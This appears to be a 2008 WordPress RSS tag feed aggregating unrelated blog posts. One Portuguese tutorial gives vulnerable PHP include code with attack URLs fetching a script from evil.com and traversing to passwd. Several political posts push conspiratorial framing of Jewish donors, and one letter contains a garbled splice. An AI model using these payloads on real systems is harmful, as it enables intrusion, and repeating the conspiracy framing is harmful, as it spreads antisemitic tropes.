<?xml version="1.0" encoding="UTF-8"?><!-- generator="wordpress.com" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>lfi &amp;laquo; WordPress.com Tag Feed</title>
	<link>http://wordpress.com/tag/lfi/</link>
	<description>Feed of posts on WordPress.com tagged "lfi"</description>
	<pubDate>Mon, 07 Jul 2008 08:08:56 +0000</pubDate>

	<generator>http://wordpress.com/tags/</generator>
	<language>en</language>

<item>
<title><![CDATA[Articulo de Seguridad]]></title>
<link>http://julianrdz.wordpress.com/?p=40</link>
<pubDate>Sun, 18 May 2008 03:53:53 +0000</pubDate>
<dc:creator>Julián Rodríguez</dc:creator>
<guid>http://julianrdz.wordpress.com/?p=40</guid>
<description><![CDATA[Bueno pues con mucha alegria vengo a postear el articulo de seguridad que escribi desde hace unos di]]></description>
<content:encoded><![CDATA[<p>Bueno pues con mucha alegria vengo a postear el articulo de seguridad que escribi desde hace unos dias para el blog ya que de alguna manera queria comenzar a redactar mis propios articulos de seguridad. Aqui les dejo la descarga y la reseña pero actualmente ya se encuentra en la seccion de "Articulos".</p>
<ul>
<li><strong>Vulnerabilidades Web</strong></li>
</ul>
<p>En este articulo se hablan sobre diferentes vulnerabilidades a nivel web, se habla sobre conceptos, codigo, ejemplos y como evitar este tipo de vulnerabilidades en nuestras aplicaciones sin perder dinamismo alguno. Los bugs tratados en este articulo son Cross Site Scripting, Remote File Inclusion y Local File Inclusion, en los diferentes temas se sigue la misma dinamica de mostrar ejemplos de codigo junto con una descripcion detallada del mismo.</p>
<p><a href="http://www.box.net/shared/9d3w0gxkw4" target="_blank">Descarga</a> ( 122 Kb. )</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Okay here's]]></title>
<link>http://educationinnb.wordpress.com/?p=181</link>
<pubDate>Thu, 01 May 2008 20:10:09 +0000</pubDate>
<dc:creator>Miriam Jones</dc:creator>
<guid>http://educationinnb.wordpress.com/?p=181</guid>
<description><![CDATA[a quick question: if in the last two years over 70% of enrollments in French immersion were in early]]></description>
<content:encoded><![CDATA[<p>a quick question: if in the last two years over 70% of enrollments in French immersion were in <em>early</em> French immersion, how on earth does Kelly Lamrock think only offering late immersion is going to get more students learning French? Does he expect that whole 70+% to take late immersion? Anyone with an adolescent can tell him it is a lot easier to convince a six-year of something, than an eleven-year old.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Blocheaza accesul la fisierele sistemului]]></title>
<link>http://unepetitemonde.wordpress.com/?p=73</link>
<pubDate>Sat, 26 Apr 2008 15:06:07 +0000</pubDate>
<dc:creator>unepetitemonde</dc:creator>
<guid>http://unepetitemonde.wordpress.com/?p=73</guid>
<description><![CDATA[Blocheaza accesul la fisierele sistemului
Ca o metoda de securitate e bine sa blocam accesul serveru]]></description>
<content:encoded><![CDATA[<p><strong>Blocheaza accesul la fisierele sistemului</strong><br />
Ca o metoda de securitate e bine sa blocam accesul serverului web la fisierele sistemului pentru ca aplicatiile vulnerabile LFI sa nu poata citi fisierele sistem si sa pericliteze stabilitatea si buna functionare a serverului web.</p>
<p>Blocarea se face folosind directiva Deny dupa cum urmeaza:<br />
<a href="http://www.lamp.ro/apache/blocheaza-accesul-la-fisierele-sistemului/" title="LAMP-Blocheaza accesul la fisierele sistemului">Click pentru a citi tutorialul complet-Blocheaza accesul la fisierele sistemului</a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[PHP - Inclusão local/remota de ficheiros]]></title>
<link>http://0x80.wordpress.com/?p=10</link>
<pubDate>Sat, 19 Apr 2008 11:03:26 +0000</pubDate>
<dc:creator>afernandesng</dc:creator>
<guid>http://0x80.wordpress.com/?p=10</guid>
<description><![CDATA[Quando construímos algum programa, temos de ter em conta a segurança. E se esse programa for para ]]></description>
<content:encoded><![CDATA[<p>Quando construímos algum programa, temos de ter em conta a segurança. E se esse programa for para acesso público, ainda mais.</p>
<p>É o caso da maior parte das aplicações web. Actualmente as falhas de segurança mais comuns são:</p>
<ul>
<li><strong>RFI</strong> Inclusão remota de ficheiros</li>
<li><strong>LFI</strong> Inclusão local de ficheiros</li>
<li><strong>SQL INJECTION</strong></li>
<li><strong>XSS</strong></li>
<li>E outras variantes...</li>
</ul>
<p>Exemplos de códigos vulneráveis escritos em PHP e respectivos ataque. (RFI e LFI)</p>
<p><strong>Código:</strong></p>
<p>&#60;?php</p>
<p>// php01.php</p>
<p>include($_GET['lang']);</p>
<p>echo "Seleccionou a linguagem {$_GET['lang']}";</p>
<p>?&#62;</p>
<p><strong>Ataque:</strong></p>
<p>http://site-da-victima.pt/php01.php?lang=http://evil.com/xxx.php</p>
<p>Então você pensa, se eu substituir <strong>include($_GET['lang']);</strong> por <strong>include($_GET['lang'].'lang.php');</strong> já não há problema... Esta muito enganado!!EHEHEH</p>
<p><strong>Código:</strong></p>
<p>&#60;?php</p>
<p>// php01.php</p>
<p>include($_GET['lang'].'lang.php');</p>
<p>echo "Seleccionou a linguagem {$_GET['lang']}";</p>
<p>?&#62;</p>
<p><strong>Ataque:</strong></p>
<p>http://site-da-victima.pt/php01.php?lang=http://evil.com/xxx.php%00</p>
<p>O caracter <strong>%00</strong> corresponde ao <strong></strong> em C, que determinava o fim de uma string. Então o <strong>%00</strong> faz com que tudo que esteja depois seja ignorado. E assim a string <strong>.'lang.php' </strong>não será processada.</p>
<p>Se o <strong>%00</strong> não funcionar pode tentar o caracter <strong>?</strong>.</p>
<p>Então você pensa novamente. Se eu substituir <strong>include($_GET['lang'].'lang.php');</strong> por <strong>include('./langs/'.$_GET['lang'].'lang.php');</strong> já não há qualquer hipotese.</p>
<p>Tem razão, em relação a inclusão remota, mas o código continua vulnerável à inclusão local.</p>
<p><strong>Código:</strong></p>
<p>&#60;?php</p>
<p>// php01.php</p>
<p>include('./langs/'.$_GET['lang'].'lang.php');</p>
<p>echo "Seleccionou a linguagem {$_GET['lang']}";</p>
<p>?&#62;</p>
<p><strong>Ataque:</strong></p>
<p>http://site-da-victima.pt/php01.php?lang=../../../../../passwd%00</p>
<p>ou então</p>
<p>http://site-da-victima.pt/php01.php?lang=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fpasswd%00</p>
<p>Também é possível injectar código PHP em imagens, para posteriormente ser executado recorrendo à LFI.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[become a hacker with webgoat]]></title>
<link>http://phpsecurity.wordpress.com/?p=78</link>
<pubDate>Tue, 15 Apr 2008 11:35:14 +0000</pubDate>
<dc:creator>b23</dc:creator>
<guid>http://phpsecurity.wordpress.com/?p=78</guid>
<description><![CDATA[WebGoat is a insecure web application which is designed to teach web  application security concepts.]]></description>
<content:encoded><![CDATA[<p>WebGoat is a insecure web application which is designed to teach web  application security concepts.<br />
You can try hacking: Access Control Flaws, Authentication Flaws, Session Management Flaws, Cross-Site Scripting (XSS), Buffer Overflows, Injection Flaws, Improper Error Handling, Insecure Storage,  Denial of Service, Insecure Configuration, Web Services and AJAX Security.</p>
<p>There is a "Lesson Plan" a kind of tutorial and in the "Hints Menu" you can view the parameters, cookies, the Code and the solution.<br />
It's a lot of fun and you learn more about web application security.</p>
<p><!--more--><br />
You can download the app from http://code.google.com/p/webgoat/.</p>
<p>It comes with the Java Runtime Environment and a configured Tomcat 5.5<br />
server and should run on any platform.</p>
<p>If you are using Linux or OSX you must download http://webgoat.googlecode.com/svn/tags/webgoat-5.1/main/webgoat.sh  to start webgoat.<br />
Put the webgoat.sh in your unpacked webgoat directory and start it<br />
with the terminal:</p>
<p>$ sh webgoat.sh start8080</p>
<p>On Windows it should run throw a double-click on webgoat8080.bat.</p>
<p>Browse to http://guest:guest@127.0.0.1:8080/WebGoat/attack with your<br />
browser and start your first lesson.</p>
<p>happy hacking</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Fifth Column Report: MP's (dis)Honoured]]></title>
<link>http://fanonite.wordpress.com/?p=1331</link>
<pubDate>Tue, 12 Feb 2008 00:11:57 +0000</pubDate>
<dc:creator>m.idrees</dc:creator>
<guid>http://fanonite.wordpress.com/?p=1331</guid>
<description><![CDATA[You couldn&#8217;t make things like these up. British MPs being honoured by a foreign state for serv]]></description>
<content:encoded><![CDATA[<p>You couldn't make things like these up. <a target="_blank" href="http://www.jpost.com/servlet/Satellite?cid=1202246357632&#38;pagename=JPost%2FJPArticle%2FShowFull">British MPs being honoured by a foreign state</a> for services rendered and handed a new errand to modify the law of their own state to accommodate foreign terrorists.</p>
<blockquote><p>Three members of Parliament were recognized for their activities advocating for Israel at a reception in the House of Commons last week.</p>
<p>At an all-party reception hosted by Israeli Ambassador Ron Prosor, Conservative Liam Fox, Labor's Louise Ellman and Liberal Democrat Lembit Opik were each presented with a silver kiddush cup in recognition of their "indefatigability."</p>
<p><!--more-->As shadow defense secretary, Fox has visited Israel on numerous occasions. At the 2006 Conservative Party Conference, he said: "Even in dealing with Israel, we must remember that in the battle for the values that we stand for, for democracy against theocracy, for democratic liberal values against repression - Israel's enemies are our enemies and this is a battle in which we all stand together or we will all fall divided."</p>
<p>Ellman is a member of the Holocaust Educational Trust's council and vice-chair of Labor Friends of Israel. Last week, she posed a question to the parliamentary under-secretary of state for international development, Shahid Malik, about steps he has taken to ensure that aid allocated to Palestinians was spent on the purposes for which it was intended.</p>
<p>After Malik told her that "aid to the occupied Palestinian territories is subject to the highest possible level of scrutiny," Ellman pointed out that on December 29, a truck was found transporting 6.5 tons of potassium nitrate, which can be used to construct bombs, into Gaza, disguised in a bag labelled "EU sugar."</p>
<p>Prosor called Ellman "a tireless champion of democracy in the Middle East and a voice of reason, calmness and perspective."</p>
<p>Opik is also the chair of the All Party Parliamentary Friends of the Bahai Faith.</p>
<p>The ambassador thanked Opik for his support and his work on human rights and Holocaust education and with Bahais.</p>
<p>Prosor also discussed Britain's Universal Jurisdiction Legislature, which has been used to issue arrest warrants for Israelis on "war crimes" charges. He said the law was detrimental to relations between Israel and the UK and called for it to be amended.</p>
<p>British citizens can file private criminal complaints of war crimes against military personnel, even if the military personnel are citizens of other countries and the alleged crimes were not committed on British soil.</p>
<p>In 2005, Maj.-Gen. (res.) Doron Almog - former OC Southern Command - evaded arrest at Heathrow Airport in London after he was warned not to disembark from an El Al flight because British detectives were waiting to arrest him for allegedly ordering the demolition of Palestinian homes in Gaza in 2002.</p>
<p>In 2006, Gaza Division commander Brig.-Gen. Aviv Kochavi, who was scheduled to study at the Royal College of Defense Studies in London, was warned by an IDF judge that he could be arrested on arrival in Britain. Kochavi canceled his trip.</p>
<p>Former Shin Bet (Israel Security Agency) chief Avi Dichter also canceled a trip last year out of concern that a warrant might be issued for his arrest.</p>
<p>Also on Wednesday, James Arbuthnot, MP, chair of the Conservative Friends of Israel Parliamentary group, asked Prime Minister Gordon Brown whether if Israel enjoyed greater security, "the lives of Palestinians would be transformed beyond recognition."</p>
<p>"I agree entirely," Brown said. "It is important that we move forward by guaranteeing the security of Israel and then responding to the urgent needs of the Palestinian people."</p>
<p>Brown said he wanted to see more action dealing with the poverty in the two areas of the Palestinian Authority, and to safeguard the security of Israel. He said he would soon discuss these issues with Prime Minister Ehud Olmert.</p></blockquote>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Grand Opening - Updating Events For This Coming Week]]></title>
<link>http://dionyeo.wordpress.com/?p=19</link>
<pubDate>Fri, 08 Feb 2008 21:35:49 +0000</pubDate>
<dc:creator>dionyeo</dc:creator>
<guid>http://dionyeo.wordpress.com/?p=19</guid>
<description><![CDATA[Extracted off my main blog(please visit here often for daily rants!)
Dear Friends and Visitors: I am]]></description>
<content:encoded><![CDATA[<p><a href="http://dionysusyeo.blogspot.com" target="_blank">Extracted off my main blog(please visit here often for daily rants!)</a></p>
<p><span style="font-family:Verdana;font-size:85%;">Dear Friends and Visitors: I am Inviting you guys and girls to come!</span></p>
<p>The Official Grand Opening of LFI Wellness Sanctuary and our Fortune Foodcourt will be on <b>16th Febuary 2008, 11am - 1.30pm</b>.<br />
We're Located at <b>Blk 89, Marine Parade Central.<br />
Level 1 Fortune FoodCourt and Level 2 LFI Wellness Sanctuary</b>.</p>
<p>Expect to meet our LFI ambassadors and our MediaCorp celebrities - <b>Tay Ping Hui, Vincent Ng &#38; Marcus Chin</b>.<br />
Please Drop me a call/sms/msg/email if you would like to drop by on that day, or if you would like to enquire further on our wellness sancuary/services, special promotions to be given away <span style="font-weight:bold;"><u>based on appointments only</u></span><u><u>!</u></u><a href="http://bp3.blogger.com/_tgY6eaTNNhw/R6iqgEpVoVI/AAAAAAAAAGA/fy8k3OIAGFg/s1600-h/MP%2Bflyer.jpg"><img src="http://bp3.blogger.com/_tgY6eaTNNhw/R6iqgEpVoVI/AAAAAAAAAGA/fy8k3OIAGFg/s200/MP%2Bflyer.jpg" style="float:left;cursor:pointer;margin:0 10px 10px 0;" border="0" /></a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Two Jewish Jokes (and a Hain in the Middle)]]></title>
<link>http://fanonite.wordpress.com/?p=1263</link>
<pubDate>Sun, 27 Jan 2008 00:39:30 +0000</pubDate>
<dc:creator>m.idrees</dc:creator>
<guid>http://fanonite.wordpress.com/?p=1263</guid>
<description><![CDATA[UK&#8217;s Israel lobby receives overdue attention, and it is already causing some jitters in the Je]]></description>
<content:encoded><![CDATA[<p>UK's Israel lobby receives overdue attention, and it is already causing some <a href="http://www.thejc.com/home.aspx?ParentId=m12s32s34&#38;SecId=34&#38;AId=57686&#38;ATypeId=1" target="_blank">jitters in the Jewish press</a>. Here's Gilad Atzmon with details (via <a href="http://peacepalestine.blogspot.com/2008/01/gilad-atzmon-two-jewish-jokes-and-hain.html" target="_blank">Peace Palestine</a>).</p>
<blockquote><p>A story is told of a Londoner, a Jewish man who was riding on the London Underground reading an Arab newspaper. A friend of his, who happened to be riding in the same underground car, noticed this strange phenomenon. Very upset, he approached the newspaper reader.</p>
<p>"Moishe, have you lost your mind? Why are you reading an Arab newspaper?" Moishe replied, "I used to read the Jewish newspaper, but what did I find? Jews being persecuted, Israel being attacked, Jews disappearing through assimilation and intermarriage, Jews living in poverty. So I switched to the Arab newspaper. Now what do I find? Jews own all the banks, Jews control the media, Jews are all rich and powerful, Jews rule the world. The news is so much better!"</p>
<p><!--more-->Truth must be said, Moishe, is telling the truth here. The Jewish press in Britain is panicking lately and they have good reason, too. While the British papers are filling their mouths with water hiding the real story behind the huge Labour donation sleaze, the UK Jewish press is overwhelmingly concerned with the unveiling saga. We have already learned about Lord ‘cash machine’ Levy who acted as ‘No 1 Labour fund raiser’. We have learned recently about David Abrahams who donated his money to the party by proxy. Both Levy and Abrahams were overwhelmingly active at the time Britain was taken into an illegal war by the Labour government. David Abrahams already admitted in an interview to the <a href="http://www.thejc.com/home.aspx?ParentId=m11&#38;SecId=11&#38;AId=56890&#38;ATypeId=1">Jewish Chronicle</a> that he donated money by proxy to “to quell conspiracy fears”.</p>
<p>Interestingly enough, the ‘<a href="http://www.opsi.gov.uk/acts/acts2000/ukpga_20000041_en_1">Political Parties, Elections and Referendums Act 2000 </a>’ introduces some clear regulations concerning donation to political parties in Britain. According to the 2000 Act, donators have to report donations worth more than £1,000 from permitted donors (individuals on the UK electoral register, or UK-registered companies) and donations worth more than £200 from unidentified or impermissible donors. The 2000 act is there to protect Britain’s political world from being subject to any criminal or foreign interests. The act is there to protect Britain from conspiracy or anything that may even look like a conspiracy.</p>
<p>Levy and Abrahams were prominent activists in the ‘Labour Friends of Israel’ and ‘Jewish Labour’. They both operate as Israeli lobbyists. It is more than possible that their interests as openly rabid Zionists do not exactly match the British interests. I am not here to suggest that this is indeed the case. However, Abrahams’s confession to the JC is there to suggest that at least Abrahams himself thought that his donation to the Labour party could be interpreted as a conspiracy.</p>
<p>Yesterday, Peter Hain, a senior British Cabinet minister resigned. Once again following a row over political donations and guess what, once again it is Zionist donators who put money into his campaign by proxy.</p>
<p>Hain, who served as Work and Pensions Secretary said he was leaving to clear his name after electoral authorities referred questions to the police about the funding of his unsuccessful campaign to become deputy Labor Party leader. Clearly, the British press avoids questioning the identity of the donators, and more crucially there is the disturbing question: what was it that they tried to buy? But as Moishe confesses in the joke above, Jewish newspapers are there to spread the depressive news.</p>
<p>Last week <a href="http://thejc.com/home.aspx?ParentId=m11&#38;SecId=11&#38;AId=57466&#38;ATypeId=1">Jewish Chronicle’s report</a> on the Hain affair is indeed very revealing yet concerning.<br />
“International diamond broker Willie Nagel, 83 — one of two Jewish benefactors to Mr Hain’s campaign through the Progressive Policies Forum — told the JC he had donated and loaned money to PPF and had “no objection that this money [had been] used to support Peter Hain’s campaign”.</p>
<p>Seemingly, Mr. Nagel changes league quite easily. As much as was happy to donate to Labour candidates in power, he was delighted to donate to the Tories at the time when they ran this country.</p>
<p>Here is the JC report:</p>
<p>“Mr Nagel, a member of St John’s Wood Synagogue, was also known to be close to the Conservatives during the premierships of Baroness Thatcher and John Major. He reportedly donated to Mr Major’s Huntingdon constituency, giving rise to reports in the media that he had attempted to interest the then-prime minister in Israeli-made unmanned aircraft at a time when the UK maintained an arms embargo on Israel.”</p>
<p>Clearly, Mr Nagel operates here as a foreign lobbyist for Israeli interests and even military interests. As much as Peter Hain was happy to receive Mr Nagel’s money, it does raise big questions as to whether Mr. Nagel was a ‘permissible’ donator. Though, he is a UK citizen, he clearly represent some foreign interests.</p>
<p>The JC continues. Mr Nagel “has been a vice-chairman of Israel Bonds UK, and played a major role in the Balfour Diamond Jubilee Trust and the British Overseas Trade Group for Israel. He is also a life-long supporter of both the Labour and Conservative Friends of Israel and appears regularly in the JC “Guest List” pages alongside leading Israeli and communal figures.”</p>
<p>Clearly Mr Nagel was there to buy Israeli interests and it is NO coincidence that Peter Hain ‘forgot’ to report of his voluntary contribution. I ask myself whether there are many donators in this country who openly send money to the two rival parties. I guess the answer is no. There are not many, there are just very few.</p>
<p>However, Mr Hain’s other benefactor is another prominent Zionist named Isaac Kaye. Mr Kaye is a South African-born multi-millionaire who was known for his support of the South African Apartheid regime.</p>
<p>Mr Kaye, 78 year old a man with dubious past “is the former chairman of Norton Healthcare, which was investigated by police looking into an alleged £400 million price-rigging of pharmaceuticals sold to the NHS.” Mr Kaye is obviously a rabid Zionist and a major Israeli Lobbyist. Again the JC report that Mr Kaye “has backed the Community Security Trust, UJIA and other Jewish and pro-Israel organisations. He is on the board of Bicom, the Britain-Israel Communications and Research Centre, and is a governor and major benefactor of the Hebrew University, where he has endowed the Kaye Research Awards.”</p>
<p>Interestingly enough, the Tories here do not do much to expose the identity of the Labour proxy donators. The reason is simple, they are backed by the very same people. We have read about Mr Nagel swinging between the two parties. Recently Parliament's sleaze watchdog has launched an inquiry into complaints made against shadow chancellor George Osborne. Mr Osborne allegedly received money from some of the wealthiest people in Britain, including banking heiress Lady Serena Rothschild, believed to have donated £190,000 to Mr Osborne.</p>
<p>Moishe is correct, the JC report is very concerning. The truth of Israeli lobbying in Britain is totally revealed in the Jewish Chronicle paper, God bless them. Interestingly enough, the British press wouldn’t touch the crux of the matter yet.</p>
<p>From Moishe’s point of view, the Guardian and the Independent are not a major concern for the time being. This might be the biggest asset of Britain and its tolerant culture. However, bearing in mind the genocide in Iraq, Britain has been led into its most devastating colonial phase ever by the Labour party. At a certain stage the question will be raised and it won’t be too long before the names Levy, Abrahams, Kaye, Nagel and a few others to pop up. This is very depressing and may even be very worrying as far as Moishe is concerned. I understand Moishe’s concerns and even feel for him.</p>
<p>However, since we have launched this article with Moishe’s joke it would be rather appropriate to end it with just another very short one,</p>
<p>A Jewish Telegram:<br />
‘Begin worrying, details to follow.’</p></blockquote>
]]></content:encoded>
</item>
<item>
<title><![CDATA[UK Israel Lobby in the Spotlight]]></title>
<link>http://fanonite.org/2008/01/18/uk-israel-lobby-in-the-spotlight/</link>
<pubDate>Fri, 18 Jan 2008 22:53:51 +0000</pubDate>
<dc:creator>m.idrees</dc:creator>
<guid>http://fanonite.org/2008/01/18/uk-israel-lobby-in-the-spotlight/</guid>
<description><![CDATA[Three years on since I first wrote an article on the Labour Friends of Israel and many LFI-related s]]></description>
<content:encoded><![CDATA[<p>Three years on since I first wrote an article on the Labour Friends of Israel and many LFI-related scandals later the spotlight is finally turning on the <a href="http://www.unobserver.com/layout5.php?id=4209&#38;blz=1" target="_blank">Israel Lobby's penetration of the UK political establishment</a>. Please read the letter below and take action.</p>
<blockquote><p><b>WILL NOBODY BRING CHRISTMAS CHEER TO BESIEGED AND STARVING GAZA?</b></p></blockquote>
<blockquote><p><b></b><b>Group urges Standards Committee to stamp out Israeli influence that paralyses heart of British government</b></p></blockquote>
<blockquote><p>As the twenty-one month long siege of Gaza becomes a death sentence for yet more civilians, a group in the UK with experience of the Occupied Territories is urging the Committee on Standards in Public Life to examine whether there is undue Israeli influence at the heart of British government.</p>
<p>The blockade stops vital medical supplies going in and prevents chronically sick patients (including children) transferring to proper hospital treatment outside Gaza. Israel’s deep penetration of our political system, says the group, is preventing Britain from taking a principled stand on Middle East matters, including the long catalogue of grotesque violations of Palestinian human rights, of which the Gaza siege is only the latest example. Conservative Friends of Israel, for example, claim the support of 80 percent of Tory MPs.</p>
<p>Signatories to the letter include Mona Baker, Karl Sabbagh, Derek Summerfield and Felicity Arbuthnot.</p>
<p><!--more-->Spokesman for the group is David Halpin, a trauma surgeon, who has spent all of the last five years of his retirement standing with the Palestinians for Justice. He has seen the destruction of lives, limbs, livings and hope at first hand. He advised the Hamas government how they should investigate the use of illegal weapons by Israel. In March, he lead a team of seven UK doctors into Gaza. The Dove and Dolphin Medical Centre was opened then. This is named after the symbolic voyage he led five years ago from which the charity was named... www.doveanddolphin.co.uk</p>
<p>He says: "It is insufficient that humans should weep beneath the crucifixion of the Palestine people in 2007 AD. They must halt it forthwith."</p>
<p>Businessman Stuart Littlewood, who was in Gaza last month, remarked: "When you urge the British government to act for justice you are blocked at every turn by Friends of Israel in high places. No-one, it seems, is prepared to break the siege and land humanitarian supplies on Gaza's beach. What happened to our Christmas spirit?"</p>
<p>Felicity Arbuthnot campaigned for many years in Iraq. She says: "The horrors inflicted on Gaza and Iraq and threatened elsewhere in the Middle East are encapsulated for me by a young doctor. She had the skills but was denied the facilities and medications so she watched helplessly as her young patients died. 'There is a hole where my heart should be,' she said. In the name of our common humanity, as Eid, the Jewish Festival of Light and Christmas are celebrated, ENOUGH!"</p>
<p>The group invites readers to join them in pressing the Standards Committee to uphold the seven Principles of Public Life and banish lobby groups acting on behalf of foreign military regimes. Write to:</p>
<p>Mr Peter Ramsden<br />
Secretary to the Committee<br />
Committee on Standards in Public Life<br />
35 Great Smith Street<br />
London SW1P 3BQ<br />
email: public@standards.x.gsi.gov.uk</p>
<p>-ends-<br />
More information from....<br />
David Halpin, 01364 661115<br />
Stuart Littlewood, 01760 755349<br />
Felicity Arbuthnot, 0208 985 0058</p>
<p>Castle Acre<br />
Norfolk</p>
<p>19 December 2007</p>
<p>public@standards.x.gsi.gov.uk</p>
<p>Mr Charles Ramsden<br />
Secretary to the Committee<br />
Committee on Standards in Public Life<br />
35 Great Smith Street<br />
London SW1P 3BQ</p>
<p>Dear Mr Ramsden,</p>
<p><b>How the Israel Lobby undermines the Principles of Standards in Public Life – a Matter for Investigation</b></p>
<p>Those signing this letter know the Occupied Territories and in particular Gaza, and are deeply concerned about the appalling conditions forced on the civilian population by the Israeli blockade and sanctions imposed by Britain and the EU.</p>
<p><b>Devastating blockade</b></p>
<p>This Christmas innocent Gazans are starving. Critically ill cancer and renal failure patients die an agonising death, unable to receive treatment because Israel blocks vital drugs and other medical supplies, including dialysis machine spares, and prevents the sick crossing the border for proper hospital care. New-born babies and those just months old are dying too, denied treatment. The United Nations Declaration of the Right of the Child lies buried under the sands of Gaza.</p>
<p>Israel has even imposed a fishing ban on the 3000 licensed fishermen, robbing them of their livelihood and the population of a proper diet. Boats ignoring the ban are fired on. Are those not Palestinian territorial waters? Have Palestinians no rights under the UN Law of the Sea Conventions?</p>
<p>The Gaza siege is the latest in a very long catalogue of Israeli violations of Palestinian rights. It has been allowed to develop into a full-blown humanitarian crisis and Britain, to its shame, has a hand in it. Furthermore it is a racist outrage that Christians and Muslims are together made to suffer so horribly at the hands of the Israeli state.</p>
<p>A letter was delivered through Henry Bellingham MP to the Foreign Office minister responsible for the Middle East, Kim Howells, suggesting (as many others have done before, including charities such as War on Want) that Britain consider suspending the EU-Israel Association Agreement. The rules provide for this if Israel’s conduct towards its neighbours falls short of what is required under the UN Charter and other obligations.</p>
<p>On 11 October Mr Howells replied: “We consider that the Association Agreement is a key tool for the EU to both enhance co-operation with Israel but also to raise any concerns. We do not support suspension of that Agreement, which would limit how we could put our viewpoint across to the Israeli government.”</p>
<p>When the EU demanded an end to the emergency in Gaza and also the military occupation of the West Bank, Israel responded with an even tighter lockdown and another letter was sent to Mr Howells. He responded on 30 November saying: “The Government does not support calls for the suspension of the EU/Israel Association Agreement. The UK…has strong relationships with Israel on a number of fronts… We do not consider it would be in the best interests of the UK, or the European Union, to end this relationship.”</p>
<p>Mr Howells is a former chairman of Labour Friends of Israel. His shadow is a member of Conservative Friends of Israel.</p>
<p>The minister has subsequently been asked to explain what "viewpoint" Her Majesty’s Government has put to the Israeli government regarding the medieval-style siege of Gaza and the collective punishment of already impoverished civilians in flagrant breach of the UN Charter and every conceivable code of conduct.</p>
<p>What action have he and his Department taken to alleviate the suffering in this former British mandate? What is the status of the coastal waters off Gaza? How can Israel maintain a sea blockade lawfully and deny Gazan fishermen their livelihood?</p>
<p>How does continuing the Association Agreement in these cruel circumstances "enhance co-operation", and what "concerns" have been raised with the Israeli government?</p>
<p>No answers to these questions have yet been received.</p>
<p><b>British MPs eating out of the Israeli government’s hand</b></p>
<p>In the meantime your Committee is aware how the lobby group, Friends of Israel, has embedded itself in the British political establishment and at the very heart of government. Its stated purpose is to promote Israel's interests in our Parliament and sway British policy.</p>
<p>MPs are surely not at liberty to act in the interest of a foreign military power at the expense of our own national interests, or to let foreign influence cloud their judgement. Such conduct is at odds with the second of the Seven Principles of Public Life, namely <b>Integrity</b> – “Holders of public office should not place themselves under any financial or other obligation to outside individuals or organisations that might seek to influence them in the performance of their official duties.”</p>
<p>The Friends of Israel organisation goes to great lengths to influence those in power. Indeed a good many, it seems, reach positions of power with FoI help. The political director of Conservative Friends of Israel claims that with over 2,000 members and registered supporters alongside 80 percent of the Conservative MPs, CFI has become the largest affiliated group in the party.</p>
<p>Its website states that the CFI "strives to support the Conservative Party at all available opportunities. In the run up to the 2005 General Election… CFI supported candidates up and down the country. As candidates are now being continuously selected for target seats, CFI has developed a special programme of weekly briefings, events with speakers and a chance to participate in delegations to Israel. CFI encourages all members to help campaign for parliamentary candidates and also for local council, London and European elections."</p>
<p>It also has a ‘Fast Track’ group for Conservative parliamentary candidates fighting target marginal seats at the next election. The political director himself is seeking election to Parliament. If successful where will his loyalty lie?</p>
<p>Senior Conservatives try to justify these activities by insisting that Israel is "a force for good in the world" and "in the battle for the values that we stand for, for democracy against theocracy, for democratic liberal values against repression - Israel's enemies are our enemies and this is a battle in which we all stand together".</p>
<p>Such claims do not bear examination. Israel is no western-style democracy. It is an ethnocracy with racist policies and an apartheid agenda. It is a cruel oppressor, stands in breach of numerous UN resolutions, ignores International Court of Justice rulings and continues an illegal occupation, abusing its neighbours and stealing their lands and resources. It cares little for world opinion. How could anyone or. She had the skills but was denied the facilities and medications so she watched helplessly as her young patients died.f fair mind and knowing the situation on the ground possibly support such a regime in the name of the British people, unless unduly under its influence?</p>
<p>Friends of Israel campaign loudly against Palestinian ‘terrorism’ without mentioning that since the start of the second Intifada in September 2000 Israelis have been slaughtering Palestinians at the rate of 4 to 1, and when it comes to children it is nearer 10 to 1 (Israeli B’Tselem figures). They never mention the ‘Matrix of Control’ and the perverse administrative procedures imposed by the Israelis in order to restrict travel, strangle the economy, bulldoze homes, confiscate lands and press ahead with their programme of ethnic displacement.</p>
<p>Friends of Israel repeatedly campaign for the release of a handful of Israeli soldiers like Gilad Shalit, corporal tank gunner, but ignore the 9,000+ Palestinian civilians abducted from their homes and incarcerated, often without trial, including some 300 women and 150 children. Many have been tortured, like Luwaii Ashqar whose lower lumbar spine was probably broken during 4 days of vicious, non-stop torment – see <a href="http://www.haaretz.com/hasen/spages/871239.htm">http://www.haaretz.com:80/hasen/spages/871239.htm</a>   and prepare to be sickened.</p>
<p>What is the basis for Britain’s decision to outlaw elected leaders (Hamas) who rightly refuse the illegal demands of an armed occupier (Israel)? And why has there been no outcry in Britain against the unlawful and inhuman siege of Gaza?</p>
<p>Courted, cosseted and lied to by the Israeli state, Friends of Israel present a distorted picture to their Parliamentary colleagues and the British public. Such people cannot be relied on to make balanced policy decisions concerning the Middle East. When speaking on such matters they should at least be required to declare their interest.</p>
<p>It is especially disconcerting to discover that at least two members of your Committee, which is pledged to uphold the Principles of Public Life, are Friends of Israel - namely Baroness Shephard, president of Conservative Friends of Israel and Alun Michael MP, a member of Labour Friends of Israel. Your website suggests that Baroness Shephard relinquished her pro-Israel position in 2005 but the CFI website contradicts this.</p>
<p><b>‘Friendship’ misplaced</b></p>
<p>The danger of inappropriate 'friendships' with foreign regimes became even more evident last week when Tzipi Livni, Israel's foreign minister, was reported to have twice asked David Miliband, our Foreign Secretary, to scrap the law that authorises magistrates to issue arrest warrants for suspected war criminals who set foot in the UK. Avi Dichter, a former director of the Shin Bet spy service and involved in the Shehadeh assassination in 2002, in which 14 Palestianian civilians (including children) were killed by an Israeli air strike, had to cancel a trip to London for fear of being arrested.</p>
